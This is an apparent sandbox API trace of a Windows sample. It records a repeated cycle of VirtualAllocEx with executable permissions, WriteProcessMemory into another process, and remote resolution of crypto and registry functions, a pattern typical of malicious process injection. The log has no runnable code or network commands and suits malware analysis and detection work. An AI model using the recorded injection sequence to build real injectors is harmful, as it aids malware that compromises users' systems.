	[0187.996] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.996] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.996] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.997] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.997] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005500c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.997] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.997] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.998] lstrlenA (lpString="RevertToSelf") returned 12
	[0187.998] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.998] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6dac*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6dac*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.998] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.998] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.998] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.998] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.999] ResetEvent (hEvent=0x478) returned 1
	[0187.999] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.999] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.999] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.999] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.999] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.999] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055010, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.000] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.000] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.000] lstrlenA (lpString="RegQueryInfoKeyA") returned 16
	[0188.000] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.000] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6d98*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6d98*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0188.000] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.001] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.001] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.001] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.001] ResetEvent (hEvent=0x478) returned 1
	[0188.001] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.001] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.002] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.002] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.002] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.002] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055014, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.002] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.002] lstrlenA (lpString="CryptCreateHash") returned 15
	[0188.002] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.002] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e18*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e18*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0188.003] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.003] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.003] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.003] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.004] ResetEvent (hEvent=0x478) returned 1
	[0188.004] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.004] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.004] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.004] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.004] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.004] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055018, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.005] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.005] lstrlenA (lpString="CryptAcquireContextA") returned 20
	[0188.005] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.005] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7922*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7922*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0188.005] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.005] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.006] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.006] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.006] ResetEvent (hEvent=0x478) returned 1
	[0188.006] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.006] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.006] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.007] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.007] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.007] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005501c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.007] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.007] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.007] lstrlenA (lpString="CryptGenRandom") returned 14
	[0188.007] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.007] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e2a*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e2a*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0188.008] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.008] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.008] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.008] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.009] ResetEvent (hEvent=0x478) returned 1
	[0188.009] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.009] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.009] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.009] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.009] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.009] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055020, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.010] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.010] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.010] lstrlenA (lpString="CryptAcquireContextW") returned 20
	[0188.010] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.010] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e3c*, nSize=0x15, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e3c*, lpNumberOfBytesWritten=0x12857c*=0x15) returned 1
	[0188.010] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.010] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.010] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.011] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.011] ResetEvent (hEvent=0x478) returned 1
	[0188.011] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.011] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.011] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.012] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.012] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055024, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.012] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.012] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.012] lstrlenA (lpString="CryptGetUserKey") returned 15
	[0188.012] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.012] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e54*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e54*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0188.013] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.013] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.013] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.013] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.014] ResetEvent (hEvent=0x478) returned 1
	[0188.014] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.014] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.014] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.014] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.014] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.014] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055028, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.015] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.015] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.015] lstrlenA (lpString="CryptDestroyKey") returned 15
	[0188.015] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.015] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6e66*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6e66*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0188.015] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.015] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.015] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.016] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.016] ResetEvent (hEvent=0x478) returned 1
	[0188.016] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.016] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.017] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.017] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.017] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.017] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005502c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.017] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.017] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.017] lstrlenA (lpString="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 52
	[0188.017] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.018] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb787e*, nSize=0x35, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb787e*, lpNumberOfBytesWritten=0x12857c*=0x35) returned 1
	[0188.018] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.018] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.018] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.018] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.019] ResetEvent (hEvent=0x478) returned 1
	[0188.019] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.019] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.019] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.019] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.019] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055030, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.020] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.020] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.020] lstrlenA (lpString="RegEnumKeyExA") returned 13
	[0188.020] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.020] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb786e*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb786e*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0188.020] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.020] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.020] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.021] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.021] ResetEvent (hEvent=0x478) returned 1
	[0188.021] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.021] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.021] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.022] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.022] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.022] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055034, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.022] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.022] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.022] lstrlenA (lpString="RegOpenKeyExA") returned 13
